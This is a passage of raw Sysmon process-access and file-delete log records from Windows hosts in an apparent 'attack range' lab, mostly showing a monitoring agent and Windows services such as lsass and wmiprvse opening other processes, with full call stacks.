Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000046117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.345{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43C168B4D24704623EFEAA5AE917C100,SHA256=F16B4C1C2F29111BE208C218F3DE4B6FD2442B2392EF01FE42DADAA936C76A47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.311{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.311{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.249{FE4C2B44-D9F5-63C7-1600-00000000AF02}12966340C:\Windows\system32\svchost.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b910|C:\Windows\system32\wbem\wbemcore.dll+255ef|C:\Windows\system32\wbem\wbemcore.dll+24a8a|C:\Windows\system32\wbem\wbemcore.dll+2484e|C:\Windows\system32\wbem\wbemcore.dll+2684b|C:\Windows\system32\wbem\wbemcore.dll+22b68|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+22701|C:\Windows\system32\wbem\wbemcore.dll+2d77c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.244{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.241{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.240{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.208{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.208{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.208{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.208{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.208{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.190{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018398Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:55.700{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 